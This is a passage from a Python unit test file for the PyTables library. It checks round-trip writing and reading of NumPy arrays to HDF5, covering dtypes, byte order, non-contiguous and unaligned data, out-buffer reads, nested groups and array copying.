                    print("Array written shape:", a.shape)
                    print("Array written itemsize:", a.itemsize)
                    print("Array written type:", a.dtype.type)
                    # print("Array read:", b)
                    print("Array read shape:", b.shape)
                    print("Array read itemsize:", b.itemsize)
                    print("Array read type:", b.dtype.type)
                    if a.dtype.kind != "S":
                        print("Array written byteorder:", a.dtype.byteorder)
                        print("Array read byteorder:", b.dtype.byteorder)

                # Check strictly the array equality
                self.assertEqual(a.shape, b.shape)
                self.assertEqual(a.shape, root.somearray.shape)
                if a.dtype.kind == "S":
                    self.assertEqual(root.somearray.atom.type, "string")
                else:
                    self.assertEqual(a.dtype.type, b.dtype.type)
                    self.assertEqual(a.dtype.type,
                                     root.somearray.atom.dtype.type)
                    abo = byteorders[a.dtype.byteorder]
                    bbo = byteorders[b.dtype.byteorder]
                    if abo != "irrelevant":
                        self.assertEqual(abo, root.somearray.byteorder)
                        # read() always returns data in native byte order
                        self.assertEqual(bbo, sys.byteorder)
                        if self.endiancheck:
                            self.assertNotEqual(bbo, abo)

                obj = root.somearray
                self.assertEqual(obj.flavor, 'numpy')
                self.assertEqual(obj.shape, a.shape)
                self.assertEqual(obj.ndim, a.ndim)
                self.assertEqual(obj.chunkshape, None)
                if a.shape:
                    nrows = a.shape[0]
                else:
                    # scalar
                    nrows = 1
                self.assertEqual(obj.nrows, nrows)
                self.assertTrue(allequal(a, b))
        finally:
            # Then, delete the file
            os.remove(filename)

    def write_read_out_arg(self, testarray):
        # Same round-trip, but reading into a caller-supplied buffer
        # via Array.read(out=...); the buffer keeps the on-disk byteorder.
        a = testarray
        if common.verbose:
            print('\n', '-=' * 30)
            print("Running test for array with type '%s'" % a.dtype.type,
                  end=' ')
            print("for class check:", self.title)

        # Create an instance of HDF5 file
        filename = tempfile.mktemp(".h5")
        try:
            with tables.open_file(filename, mode="w") as fileh:
                root = fileh.root

                # Create the array under root and name 'somearray'
                if self.endiancheck and a.dtype.kind != "S":
                    b = a.byteswap()
                    b.dtype = a.dtype.newbyteorder()
                    a = b

                fileh.create_array(root, 'somearray', a, "Some array")

            # Re-open the file in read-only mode
            with tables.open_file(filename, mode="r") as fileh:
                root = fileh.root

                # Read the saved array
                b = numpy.empty_like(a, dtype=a.dtype)
                root.somearray.read(out=b)

                # Check strictly the array equality
                self.assertEqual(a.shape, b.shape)
                self.assertEqual(a.shape, root.somearray.shape)
                if a.dtype.kind == "S":
                    self.assertEqual(root.somearray.atom.type, "string")
                else:
                    self.assertEqual(a.dtype.type, b.dtype.type)
                    self.assertEqual(a.dtype.type,
                                     root.somearray.atom.dtype.type)
                    abo = byteorders[a.dtype.byteorder]
                    bbo = byteorders[b.dtype.byteorder]
                    if abo != "irrelevant":
                        self.assertEqual(abo, root.somearray.byteorder)
                        # out= preserves the stored byte order (no swap)
                        self.assertEqual(abo, bbo)
                    if self.endiancheck:
                        self.assertNotEqual(bbo, sys.byteorder)

                self.assertTrue(allequal(a, b))
        finally:
            # Then, delete the file
            os.remove(filename)

    def write_read_atom_shape_args(self, testarray):
        # Same round-trip, but creating the node from atom=/shape= args
        # and filling it afterwards with ptarr[...] = a.
        a = testarray
        atom = Atom.from_dtype(a.dtype)
        shape = a.shape
        byteorder = None

        if common.verbose:
            print('\n', '-=' * 30)
            print("Running test for array with type '%s'" % a.dtype.type,
                  end=' ')
            print("for class check:", self.title)

        # Create an instance of HDF5 file
        filename = tempfile.mktemp(".h5")
        try:
            with tables.open_file(filename, mode="w") as fileh:
                root = fileh.root

                # Create the array under root and name 'somearray'
                if self.endiancheck and a.dtype.kind != "S":
                    b = a.byteswap()
                    b.dtype = a.dtype.newbyteorder()
                    if b.dtype.byteorder in ('>', '<'):
                        byteorder = byteorders[b.dtype.byteorder]
                    a = b

                ptarr = fileh.create_array(root, 'somearray',
                                           atom=atom, shape=shape,
                                           title="Some array",
                                           # specify the byteorder explicitly
                                           # since there is no way to deduce
                                           # it in this case
                                           byteorder=byteorder)
                self.assertEqual(shape, ptarr.shape)
                self.assertEqual(atom, ptarr.atom)
                ptarr[...] = a

            # Re-open the file in read-only mode
            with tables.open_file(filename, mode="r") as fileh:
                root = fileh.root

                # Read the saved array
                b = root.somearray.read()

                # Compare them. They should be equal.
                if common.verbose and not allequal(a, b):
                    print("Write and read arrays differ!")
                    # print("Array written:", a)
                    print("Array written shape:", a.shape)
                    print("Array written itemsize:", a.itemsize)
                    print("Array written type:", a.dtype.type)
                    # print("Array read:", b)
                    print("Array read shape:", b.shape)
                    print("Array read itemsize:", b.itemsize)
                    print("Array read type:", b.dtype.type)
                    if a.dtype.kind != "S":
                        print("Array written byteorder:", a.dtype.byteorder)
                        print("Array read byteorder:", b.dtype.byteorder)

                # Check strictly the array equality
                self.assertEqual(a.shape, b.shape)
                self.assertEqual(a.shape, root.somearray.shape)
                if a.dtype.kind == "S":
                    self.assertEqual(root.somearray.atom.type, "string")
                else:
                    self.assertEqual(a.dtype.type, b.dtype.type)
                    self.assertEqual(a.dtype.type,
                                     root.somearray.atom.dtype.type)
                    abo = byteorders[a.dtype.byteorder]
                    bbo = byteorders[b.dtype.byteorder]
                    if abo != "irrelevant":
                        self.assertEqual(abo, root.somearray.byteorder)
                        self.assertEqual(bbo, sys.byteorder)
                        if self.endiancheck:
                            self.assertNotEqual(bbo, abo)

                obj = root.somearray
                self.assertEqual(obj.flavor, 'numpy')
                self.assertEqual(obj.shape, a.shape)
                self.assertEqual(obj.ndim, a.ndim)
                self.assertEqual(obj.chunkshape, None)
                if a.shape:
                    nrows = a.shape[0]
                else:
                    # scalar
                    nrows = 1
                self.assertEqual(obj.nrows, nrows)
                self.assertTrue(allequal(a, b))
        finally:
            # Then, delete the file
            os.remove(filename)

    def setup00_char(self):
        """Data integrity during recovery (character objects)"""
        if not isinstance(self.tupleChar, numpy.ndarray):
            a = numpy.array(self.tupleChar, dtype="S")
        else:
            a = self.tupleChar
        return a

    def test00_char(self):
        a = self.setup00_char()
        self.write_read(a)

    def test00_char_out_arg(self):
        a = self.setup00_char()
        self.write_read_out_arg(a)

    def test00_char_atom_shape_args(self):
        a = self.setup00_char()
        self.write_read_atom_shape_args(a)

    def test00b_char(self):
        """Data integrity during recovery (string objects)"""
        a = self.tupleChar

        filename = tempfile.mktemp(".h5")
        try:
            # Create an instance of HDF5 file
            with tables.open_file(filename, mode="w") as fileh:
                fileh.create_array(fileh.root, 'somearray', a, "Some array")

            # Re-open the file in read-only mode
            with tables.open_file(filename, mode="r") as fileh:
                # Read the saved array
                b = fileh.root.somearray.read()
                if isinstance(a, bytes):
                    self.assertEqual(type(b), bytes)
                    self.assertEqual(a, b)
                else:
                    # If a is not a python string, then it should be a list
                    # or ndarray
                    self.assertTrue(type(b) in [list, numpy.ndarray])
        finally:
            # Then, delete the file
            os.remove(filename)

    def test00b_char_out_arg(self):
        """Data integrity during recovery (string objects)"""
        a = self.tupleChar

        filename = tempfile.mktemp(".h5")
        try:
            # Create an instance of HDF5 file
            with tables.open_file(filename, mode="w") as fileh:
                fileh.create_array(fileh.root, 'somearray', a, "Some array")

            # Re-open the file in read-only mode
            with tables.open_file(filename, mode="r") as fileh:
                # Read the saved array
                b = numpy.empty_like(a)
                # read(out=...) only supports the 'numpy' flavor
                if fileh.root.somearray.flavor != 'numpy':
                    self.assertRaises(TypeError,
                                      lambda: fileh.root.somearray.read(out=b))
                else:
                    fileh.root.somearray.read(out=b)
                self.assertTrue(type(b), numpy.ndarray)
        finally:
            # Then, delete the file
            os.remove(filename)

    def test00b_char_atom_shape_args(self):
        """Data integrity during recovery (string objects)"""
        a = self.tupleChar

        filename = tempfile.mktemp(".h5")
        try:
            # Create an instance of HDF5 file
            with tables.open_file(filename, mode="w") as fileh:
                nparr = numpy.asarray(a)
                atom = Atom.from_dtype(nparr.dtype)
                shape = nparr.shape
                if nparr.dtype.byteorder in ('>', '<'):
                    byteorder = byteorders[nparr.dtype.byteorder]
                else:
                    byteorder = None
                ptarr = fileh.create_array(fileh.root, 'somearray',
                                           atom=atom, shape=shape,
                                           byteorder=byteorder,
                                           title="Some array")
                self.assertEqual(shape, ptarr.shape)
                self.assertEqual(atom, ptarr.atom)
                ptarr[...] = a

            # Re-open the file in read-only mode
            with tables.open_file(filename, mode="r") as fileh:
                # Read the saved array
                b = numpy.empty_like(a)
                if fileh.root.somearray.flavor != 'numpy':
                    self.assertRaises(TypeError,
                                      lambda: fileh.root.somearray.read(out=b))
                else:
                    fileh.root.somearray.read(out=b)
                self.assertTrue(type(b), numpy.ndarray)
        finally:
            # Then, delete the file
            os.remove(filename)

    def setup01_char_nc(self):
        """Data integrity during recovery (non-contiguous character objects)"""
        if not isinstance(self.tupleChar, numpy.ndarray):
            a = numpy.array(self.tupleChar, dtype="S")
        else:
            a = self.tupleChar
        if a.ndim == 0:
            b = a.copy()
        else:
            # Every-other-element slice makes a non-contiguous view.
            b = a[::2]
            # Ensure that this numpy string is non-contiguous
            if len(b) > 1:
                self.assertEqual(b.flags.contiguous, False)
        return b

    def test01_char_nc(self):
        b = self.setup01_char_nc()
        self.write_read(b)

    def test01_char_nc_out_arg(self):
        b = self.setup01_char_nc()
        self.write_read_out_arg(b)

    def test01_char_nc_atom_shape_args(self):
        b = self.setup01_char_nc()
        self.write_read_atom_shape_args(b)

    def test02_types(self):
        """Data integrity during recovery (numerical types)"""
        typecodes = ['int8', 'int16', 'int32', 'int64',
                     'uint8', 'uint16', 'uint32', 'uint64',
                     'float32', 'float64',
                     'complex64', 'complex128']

        # Optional types: only tested if this build of PyTables has them.
        for name in ('float16', 'float96', 'float128',
                     'complex192', 'complex256'):
            atomname = name.capitalize() + 'Atom'
            if hasattr(tables, atomname):
                typecodes.append(name)

        for typecode in typecodes:
            a = numpy.array(self.tupleInt, typecode)
            self.write_read(a)
            b = numpy.array(self.tupleInt, typecode)
            self.write_read_out_arg(b)
            c = numpy.array(self.tupleInt, typecode)
            self.write_read_atom_shape_args(c)

    def test03_types_nc(self):
        """Data integrity during recovery (non-contiguous numerical types)"""
        typecodes = ['int8', 'int16', 'int32', 'int64',
                     'uint8', 'uint16', 'uint32', 'uint64',
                     'float32', 'float64',
                     'complex64', 'complex128', ]

        # Optional types: only tested if this build of PyTables has them.
        for name in ('float16', 'float96', 'float128',
                     'complex192', 'complex256'):
            atomname = name.capitalize() + 'Atom'
            if hasattr(tables, atomname):
                typecodes.append(name)

        for typecode in typecodes:
            a = numpy.array(self.tupleInt, typecode)
            if a.ndim == 0:
                b1 = a.copy()
                b2 = a.copy()
                b3 = a.copy()
            else:
                b1 = a[::2]
                b2 = a[::2]
                b3 = a[::2]
                # Ensure that this array is non-contiguous
                if len(b1) > 1:
                    self.assertEqual(b1.flags.contiguous, False)
                if len(b2) > 1:
                    self.assertEqual(b2.flags.contiguous, False)
                if len(b3) > 1:
                    self.assertEqual(b3.flags.contiguous, False)
            self.write_read(b1)
            self.write_read_out_arg(b2)
            self.write_read_atom_shape_args(b3)


class Basic0DOneTestCase(BasicTestCase):
    # Scalar case
    title = "Rank-0 case 1"
    tupleInt = 3
    tupleChar = b"3"
    endiancheck = True


class Basic0DTwoTestCase(BasicTestCase):
    # Scalar case
    title = "Rank-0 case 2"
    tupleInt = 33
    tupleChar = b"33"
    endiancheck = True


class Basic1DZeroTestCase(BasicTestCase):
    # This test case is not supported by PyTables (HDF5 limitations)
    # 1D case
    title = "Rank-1 case 0"
    tupleInt = ()
    tupleChar = ()
    endiancheck = False


class Basic1DOneTestCase(BasicTestCase):
    # 1D case
    title = "Rank-1 case 1"
    tupleInt = (3,)
    tupleChar = (b"a",)
    endiancheck = True


class Basic1DTwoTestCase(BasicTestCase):
    # 1D case
    title = "Rank-1 case 2"
    tupleInt = (3, 4)
    tupleChar = (b"aaa",)
    endiancheck = True


class Basic1DThreeTestCase(BasicTestCase):
    # 1D case
    title = "Rank-1 case 3"
    tupleInt = (3, 4, 5)
    tupleChar = (b"aaa", b"bbb",)
    endiancheck = True


class Basic2DOneTestCase(BasicTestCase):
    # 2D case
    title = "Rank-2 case 1"
    tupleInt = numpy.array(numpy.arange((4)**2))
    tupleInt.shape = (4,)*2
    tupleChar = numpy.array(["abc"]*3**2, dtype="S3")
    tupleChar.shape = (3,)*2
    endiancheck = True


class Basic2DTwoTestCase(BasicTestCase):
    # 2D case, with a multidimensional dtype
    title = "Rank-2 case 2"
    tupleInt = numpy.array(numpy.arange((4)), dtype=(numpy.int_, (4,)))
    tupleChar = numpy.array(["abc"]*3, dtype=("S3", (3,)))
    endiancheck = True


class Basic10DTestCase(BasicTestCase):
    # 10D case
    title = "Rank-10 test"
    tupleInt = numpy.array(numpy.arange((2)**10))
    # NOTE(review): these lines are the tail of a rank-10 Basic*DTestCase
    # subclass whose header lies above this chunk -- confirm against the
    # full file.
    tupleInt.shape = (2,)*10
    tupleChar = numpy.array(["abc"]*2**10, dtype="S3")
    tupleChar.shape = (2,)*10
    endiancheck = True


class Basic32DTestCase(BasicTestCase):
    # 32D case (maximum rank supported)
    title = "Rank-32 test"
    tupleInt = numpy.array((32,))
    tupleInt.shape = (1,)*32
    tupleChar = numpy.array(["121"], dtype="S3")
    tupleChar.shape = (1,)*32


class ReadOutArgumentTests(common.TempFileMixin, TestCase):
    """Tests for the ``out`` argument of ``Array.read``."""

    def setUp(self):
        super(ReadOutArgumentTests, self).setUp()
        self.size = 1000

    def create_array(self):
        # Return an (in-memory ndarray, on-disk Array node) pair with
        # identical float64 contents for the tests below.
        array = numpy.arange(self.size, dtype='f8')
        disk_array = self.h5file.create_array('/', 'array', array)
        return array, disk_array

    def test_read_entire_array(self):
        # Reading the whole array into a pre-allocated buffer.
        array, disk_array = self.create_array()
        out_buffer = numpy.empty((self.size, ), 'f8')
        disk_array.read(out=out_buffer)
        numpy.testing.assert_equal(out_buffer, array)

    def test_read_contiguous_slice1(self):
        # Reading into the tail half of a buffer must leave the head intact.
        array, disk_array = self.create_array()
        out_buffer = numpy.arange(self.size, dtype='f8')
        out_buffer = numpy.random.permutation(out_buffer)
        out_buffer_orig = out_buffer.copy()
        start = self.size // 2
        disk_array.read(start=start, stop=self.size, out=out_buffer[start:])
        numpy.testing.assert_equal(out_buffer[start:], array[start:])
        numpy.testing.assert_equal(out_buffer[:start], out_buffer_orig[:start])

    def test_read_contiguous_slice2(self):
        # Reading into an interior slice must leave both ends intact.
        array, disk_array = self.create_array()
        out_buffer = numpy.arange(self.size, dtype='f8')
        out_buffer = numpy.random.permutation(out_buffer)
        out_buffer_orig = out_buffer.copy()
        start = self.size // 4
        stop = self.size - start
        disk_array.read(start=start, stop=stop, out=out_buffer[start:stop])
        numpy.testing.assert_equal(out_buffer[start:stop], array[start:stop])
        numpy.testing.assert_equal(out_buffer[:start], out_buffer_orig[:start])
        numpy.testing.assert_equal(out_buffer[stop:], out_buffer_orig[stop:])

    def test_read_non_contiguous_slice_contiguous_buffer(self):
        # A strided read (step=2) into a contiguous buffer is allowed.
        array, disk_array = self.create_array()
        out_buffer = numpy.empty((self.size // 2, ), dtype='f8')
        disk_array.read(start=0, stop=self.size, step=2, out=out_buffer)
        numpy.testing.assert_equal(out_buffer, array[0:self.size:2])

    def test_read_non_contiguous_buffer(self):
        # A non-contiguous output buffer must be rejected with ValueError.
        array, disk_array = self.create_array()
        out_buffer = numpy.empty((self.size, ), 'f8')
        out_buffer_slice = out_buffer[0:self.size:2]
        # once Python 2.6 support is dropped, this could change
        # to assertRaisesRegexp to check exception type and message at once
        self.assertRaises(ValueError, disk_array.read, 0, self.size, 2,
                          out_buffer_slice)
        try:
            disk_array.read(0, self.size, 2, out_buffer_slice)
        except ValueError as exc:
            self.assertEqual('output array not C contiguous', str(exc))

    def test_buffer_too_small(self):
        # An undersized output buffer must be rejected with ValueError.
        array, disk_array = self.create_array()
        out_buffer = numpy.empty((self.size // 2, ), 'f8')
        self.assertRaises(ValueError, disk_array.read, 0, self.size, 1,
                          out_buffer)
        try:
            disk_array.read(0, self.size, 1, out_buffer)
        except ValueError as exc:
            self.assertTrue('output array size invalid, got' in str(exc))

    def test_buffer_too_large(self):
        # An oversized output buffer must be rejected with ValueError.
        array, disk_array = self.create_array()
        out_buffer = numpy.empty((self.size + 1, ), 'f8')
        self.assertRaises(ValueError, disk_array.read, 0, self.size, 1,
                          out_buffer)
        try:
            disk_array.read(0, self.size, 1, out_buffer)
        except ValueError as exc:
            self.assertTrue('output array size invalid, got' in str(exc))


class SizeOnDiskInMemoryPropertyTestCase(common.TempFileMixin, TestCase):
    """Checks the ``size_on_disk`` / ``size_in_memory`` Array properties."""

    def setUp(self):
        super(SizeOnDiskInMemoryPropertyTestCase, self).setUp()
        self.array_size = (10, 10)
        self.array = self.h5file.create_array(
            '/', 'somearray', numpy.zeros(self.array_size, 'i4'))

    def test_all_zeros(self):
        # 10x10 int32 -> 400 bytes, both on disk and in memory
        # (plain Arrays are not compressed).
        self.assertEqual(self.array.size_on_disk, 10 * 10 * 4)
        self.assertEqual(self.array.size_in_memory, 10 * 10 * 4)


class UnalignedAndComplexTestCase(common.TempFileMixin, TestCase):
    """Basic test for all the supported typecodes present in numpy.

    Most of them are included on PyTables.

    """

    def setUp(self):
        super(UnalignedAndComplexTestCase, self).setUp()
        self.root = self.h5file.root

    def write_read(self, testArray):
        # Write `testArray` under /somearray (optionally with the opposite
        # byteorder, per the `endiancheck` class flag), read it back
        # (optionally after reopening, per `reopen`) and compare.
        if common.verbose:
            print('\n', '-=' * 30)
            print("\nRunning test for array with type '%s'" %
                  testArray.dtype.type)

        # Create the array under root and name 'somearray'
        a = testArray
        if self.endiancheck:
            byteorder = {"little": "big", "big": "little"}[sys.byteorder]
        else:
            byteorder = sys.byteorder

        self.h5file.create_array(self.root, 'somearray', a, "Some array",
                                 byteorder=byteorder)

        if self.reopen:
            self._reopen()
            self.root = self.h5file.root

        # Read the saved array
        b = self.root.somearray.read()

        # Get an array to be compared in the correct byteorder
        c = a.newbyteorder(byteorder)

        # Compare them. They should be equal.
        if not allequal(c, b) and common.verbose:
            print("Write and read arrays differ!")
            print("Array written:", a)
            print("Array written shape:", a.shape)
            print("Array written itemsize:", a.itemsize)
            print("Array written type:", a.dtype.type)
            print("Array read:", b)
            print("Array read shape:", b.shape)
            print("Array read itemsize:", b.itemsize)
            print("Array read type:", b.dtype.type)

        # Check strictly the array equality
        self.assertEqual(a.shape, b.shape)
        self.assertEqual(a.shape, self.root.somearray.shape)
        if a.dtype.byteorder != "|":
            self.assertEqual(a.dtype, b.dtype)
            self.assertEqual(a.dtype, self.root.somearray.atom.dtype)
            self.assertEqual(byteorders[b.dtype.byteorder], sys.byteorder)
            self.assertEqual(self.root.somearray.byteorder, byteorder)

        self.assertTrue(allequal(c, b))

    def test01_signedShort_unaligned(self):
        """Checking an unaligned signed short integer array"""

        r = numpy.rec.array(b'a'*200, formats='i1,f4,i2', shape=10)
        a = r["f2"]
        # Ensure that this array is non-aligned
        self.assertEqual(a.flags.aligned, False)
        self.assertEqual(a.dtype.type, numpy.int16)
        self.write_read(a)

    def test02_float_unaligned(self):
        """Checking an unaligned single precision array"""

        r = numpy.rec.array(b'a'*200, formats='i1,f4,i2', shape=10)
        a = r["f1"]
        # Ensure that this array is non-aligned
        self.assertEqual(a.flags.aligned, 0)
        self.assertEqual(a.dtype.type, numpy.float32)
        self.write_read(a)

    def test03_byte_offset(self):
        """Checking an offsetted byte array"""

        r = numpy.arange(100, dtype=numpy.int8)
        r.shape = (10, 10)
        a = r[2]
        self.write_read(a)

    def test04_short_offset(self):
        """Checking an offsetted unsigned short int precision array"""

        # NOTE(review): the docstring says "short" but the dtype used is
        # uint32 -- confirm which width was intended.
        r = numpy.arange(100, dtype=numpy.uint32)
        r.shape = (10, 10)
        a = r[2]
        self.write_read(a)

    def test05_int_offset(self):
        """Checking an offsetted integer array"""

        r = numpy.arange(100, dtype=numpy.int32)
        r.shape = (10, 10)
        a = r[2]
        self.write_read(a)

    def test06_longlongint_offset(self):
        """Checking an offsetted long long integer array"""

        r = numpy.arange(100, dtype=numpy.int64)
        r.shape = (10, 10)
        a = r[2]
        self.write_read(a)

    def test07_float_offset(self):
        """Checking an offsetted single precision array"""

        r = numpy.arange(100, dtype=numpy.float32)
        r.shape = (10, 10)
        a = r[2]
        self.write_read(a)

    def test08_double_offset(self):
        """Checking an offsetted double precision array"""

        r = numpy.arange(100, dtype=numpy.float64)
        r.shape = (10, 10)
        a = r[2]
        self.write_read(a)

    def test09_float_offset_unaligned(self):
        """Checking an unaligned and offsetted single precision array"""

        r = numpy.rec.array(b'a'*200, formats='i1,3f4,i2', shape=10)
        a = r["f1"][3]
        # Ensure that this array is non-aligned
        self.assertEqual(a.flags.aligned, False)
        self.assertEqual(a.dtype.type, numpy.float32)
        self.write_read(a)

    def test10_double_offset_unaligned(self):
        """Checking an unaligned and offsetted double precision array"""

        r = numpy.rec.array(b'a'*400, formats='i1,3f8,i2', shape=10)
        a = r["f1"][3]
        # Ensure that this array is non-aligned
        self.assertEqual(a.flags.aligned, False)
        self.assertEqual(a.dtype.type, numpy.float64)
        self.write_read(a)

    def test11_int_byteorder(self):
        """Checking setting data with different byteorder in a range
        (integer)"""

        # Save an array with the reversed byteorder on it
        a = numpy.arange(25, dtype=numpy.int32).reshape(5, 5)
        a = a.byteswap()
        a = a.newbyteorder()
        array = self.h5file.create_array(
            self.h5file.root, 'array', a, "byteorder (int)")

        # Read a subarray (got an array with the machine byteorder)
        b = array[2:4, 3:5]
        b = b.byteswap()
        b = b.newbyteorder()

        # Set this subarray back to the array
        array[2:4, 3:5] = b
        b = b.byteswap()
        b = b.newbyteorder()

        # Set this subarray back to the array
        # (the swap/set is done twice, restoring b to machine order)
        array[2:4, 3:5] = b

        # Check that the array is back in the correct byteorder
        c = array[...]
        if common.verbose:
            print("byteorder of array on disk-->", array.byteorder)
            print("byteorder of subarray-->", b.dtype.byteorder)
            print("subarray-->", b)
            print("retrieved array-->", c)
        self.assertTrue(allequal(a, c))

    def test12_float_byteorder(self):
        """Checking setting data with different byteorder in a range
        (float)"""

        # Save an array with the reversed byteorder on it
        a = numpy.arange(25, dtype=numpy.float64).reshape(5, 5)
        a = a.byteswap()
        a = a.newbyteorder()
        array = self.h5file.create_array(
            self.h5file.root, 'array', a, "byteorder (float)")

        # Read a subarray (got an array with the machine byteorder)
        b = array[2:4, 3:5]
        b = b.byteswap()
        b = b.newbyteorder()

        # Set this subarray back to the array
        array[2:4, 3:5] = b
        b = b.byteswap()
        b = b.newbyteorder()

        # Set this subarray back to the array
        # (the swap/set is done twice, restoring b to machine order)
        array[2:4, 3:5] = b

        # Check that the array is back in the correct byteorder
        c = array[...]
        if common.verbose:
            print("byteorder of array on disk-->", array.byteorder)
            print("byteorder of subarray-->", b.dtype.byteorder)
            print("subarray-->", b)
            print("retrieved array-->", c)
        self.assertTrue(allequal(a, c))


# Parametrizations of UnalignedAndComplexTestCase over the
# (endiancheck, reopen) flag combinations.
class ComplexNotReopenNotEndianTestCase(UnalignedAndComplexTestCase):
    endiancheck = False
    reopen = False


class ComplexReopenNotEndianTestCase(UnalignedAndComplexTestCase):
    endiancheck = False
    reopen = True


class ComplexNotReopenEndianTestCase(UnalignedAndComplexTestCase):
    endiancheck = True
    reopen = False


class ComplexReopenEndianTestCase(UnalignedAndComplexTestCase):
    endiancheck = True
    reopen = True


class GroupsArrayTestCase(common.TempFileMixin, TestCase):
    """This test class checks combinations of arrays with groups."""

    def test00_iterativeGroups(self):
        """Checking combinations of arrays with groups."""

        if common.verbose:
            print('\n', '-=' * 30)
            print("Running %s.test00_iterativeGroups..."
                  % self.__class__.__name__)

        # Get the root group
        group = self.h5file.root

        # Set the type codes to test
        # The typecodes below does expose an ambiguity that is reported in:
        # http://projects.scipy.org/scipy/numpy/ticket/283 and
        # http://projects.scipy.org/scipy/numpy/ticket/290
        typecodes = ['b', 'B', 'h', 'H', 'i', 'I', 'l', 'L', 'q', 'f', 'd',
                     'F', 'D']
        if hasattr(tables, 'Float16Atom'):
            typecodes.append('e')
        if hasattr(tables, 'Float96Atom') or hasattr(tables, 'Float128Atom'):
            typecodes.append('g')
        if (hasattr(tables, 'Complex192Atom') or
                hasattr(tables, 'Complex256Atom')):
            typecodes.append('G')

        # Write one array per typecode, nesting one group level each time.
        for i, typecode in enumerate(typecodes):
            a = numpy.ones((3,), typecode)
            dsetname = 'array_' + typecode
            if common.verbose:
                print("Creating dataset:", group._g_join(dsetname))
            self.h5file.create_array(group, dsetname, a, "Large array")
            group = self.h5file.create_group(group, 'group' + str(i))

        # Reopen the file
        self._reopen()

        # Get the root group
        group = self.h5file.root

        # Get the metadata on the previosly saved arrays
        for i in range(len(typecodes)):
            # Create an array for later comparison
            a = numpy.ones((3,), typecodes[i])
            # Get the dset object hanging from group
            dset = getattr(group, 'array_' + typecodes[i])
            # Get the actual array
            b = dset.read()
            if common.verbose:
                print("Info from dataset:", dset._v_pathname)
                print("  shape ==>", dset.shape, end=' ')
                print("  type ==> %s" % dset.atom.dtype)
                print("Array b read from file. Shape: ==>", b.shape, end=' ')
                print(". Type ==> %s" % b.dtype)
            self.assertEqual(a.shape, b.shape)
            self.assertEqual(a.dtype, b.dtype)
            self.assertTrue(allequal(a, b))

            # Iterate over the next group
            group = getattr(group, 'group' + str(i))

    def test01_largeRankArrays(self):
        """Checking creation of large rank arrays (0 < rank <= 32)

        It also uses arrays ranks which ranges until maxrank.

        """

        # maximum level of recursivity (deepest group level) achieved:
        # maxrank = 32 (for a effective maximum rank of 32)
        # This limit is due to HDF5 library limitations.
        minrank = 1
        maxrank = 32

        if common.verbose:
            print('\n', '-=' * 30)
            print("Running %s.test01_largeRankArrays..."
                  % self.__class__.__name__)
            print("Maximum rank for tested arrays:", maxrank)

        group = self.h5file.root
        if common.verbose:
            print("Rank array writing progress: ", end=' ')
        for rank in range(minrank, maxrank + 1):
            # Create an array of integers, with incrementally bigger ranges
            a = numpy.ones((1,) * rank, numpy.int32)
            if common.verbose:
                print("%3d," % (rank), end=' ')
            self.h5file.create_array(group, "array", a, "Rank: %s" % rank)
            group = self.h5file.create_group(group, 'group' + str(rank))

        # Reopen the file
        self._reopen()

        group = self.h5file.root
        if common.verbose:
            print()
            print("Rank array reading progress: ")
        # Get the metadata on the previosly saved arrays
        for rank in range(minrank, maxrank + 1):
            # Create an array for later comparison
            a = numpy.ones((1,) * rank, numpy.int32)
            # Get the actual array
            b = group.array.read()
            if common.verbose:
                print("%3d," % (rank), end=' ')
            if common.verbose and not allequal(a, b):
                print("Info from dataset:", group.array._v_pathname)
                print("  Shape: ==>", group.array.shape, end=' ')
                print("  typecode ==> %c" % group.array.typecode)
                print("Array b read from file. Shape: ==>", b.shape, end=' ')
                print(". Type ==> %c" % b.dtype)
            self.assertEqual(a.shape, b.shape)
            self.assertEqual(a.dtype, b.dtype)
            self.assertTrue(allequal(a, b))

            # print(self.h5file)
            # Iterate over the next group
            group = self.h5file.get_node(group, 'group' + str(rank))

        if common.verbose:
            print()  # This flush the stdout buffer


class CopyTestCase(common.TempFileMixin, TestCase):
    """Checks the ``Array.copy()`` method (subclasses set ``close``)."""

    def test01_copy(self):
        """Checking Array.copy() method."""

        if common.verbose:
            print('\n', '-=' * 30)
            print("Running %s.test01_copy..."
                  % self.__class__.__name__)

        # Create an Array
        arr = numpy.array([[456, 2], [3, 457]], dtype='int16')
        array1 = self.h5file.create_array(
            self.h5file.root, 'array1', arr, "title array1")

        # Copy to another Array
        array2 = array1.copy('/', 'array2')

        if self.close:
            if common.verbose:
                print("(closing file version)")
            self._reopen()
            array1 = self.h5file.root.array1
            array2 = self.h5file.root.array2

        if common.verbose:
            print("array1-->", array1.read())
            print("array2-->", array2.read())
            # print("dirs-->", dir(array1), dir(array2))
            print("attrs array1-->", repr(array1.attrs))
            print("attrs array2-->", repr(array2.attrs))

        # Check that all the elements are equal
        self.assertTrue(allequal(array1.read(), array2.read()))

        # Assert other properties in array
        self.assertEqual(array1.nrows, array2.nrows)
        self.assertEqual(array1.flavor, array2.flavor)
        self.assertEqual(array1.atom.dtype, array2.atom.dtype)
        self.assertEqual(array1.title, array2.title)

    def test02_copy(self):
        """Checking Array.copy() method (where specified)"""

        if common.verbose:
            print('\n', '-=' * 30)
            print("Running %s.test02_copy..."
                  % self.__class__.__name__)

        # Create an Array
        arr = numpy.array([[456, 2], [3, 457]], dtype='int16')
        array1 = self.h5file.create_array(
            self.h5file.root, 'array1', arr, "title array1")

        # Copy to another Array in an explicit destination group
        group1 = self.h5file.create_group("/", "group1")
        array2 = array1.copy(group1, 'array2')

        if self.close:
            if common.verbose:
                print("(closing file version)")
            self._reopen()
            array1 = self.h5file.root.array1
            array2 = self.h5file.root.group1.array2

        if common.verbose:
            print("array1-->", array1.read())
            print("array2-->", array2.read())
            # print("dirs-->", dir(array1), dir(array2))
            print("attrs array1-->", repr(array1.attrs))
            print("attrs array2-->", repr(array2.attrs))

        # Check that all the elements are equal
        self.assertTrue(allequal(array1.read(), array2.read()))

        # Assert other properties in array
        self.assertEqual(array1.nrows, array2.nrows)
        self.assertEqual(array1.flavor, array2.flavor)
        self.assertEqual(array1.atom.dtype, array2.atom.dtype)
        self.assertEqual(array1.title, array2.title)

    def test03_copy(self):
        """Checking Array.copy() method (checking title copying)"""

        if common.verbose:
            print('\n', '-=' * 30)
            # NOTE(review): message says "test04_copy" but the method is
            # test03_copy -- runtime string left untouched.
            print("Running %s.test04_copy..." % self.__class__.__name__)

        # Create an Array
        arr = numpy.array([[456, 2], [3, 457]], dtype='int16')
        array1 = self.h5file.create_array(
            self.h5file.root, 'array1', arr, "title array1")
        # Append some user attrs
        array1.attrs.attr1 = "attr1"
        array1.attrs.attr2 = 2
        # Copy it to another Array
        array2 = array1.copy('/', 'array2', title="title array2")

        if self.close:
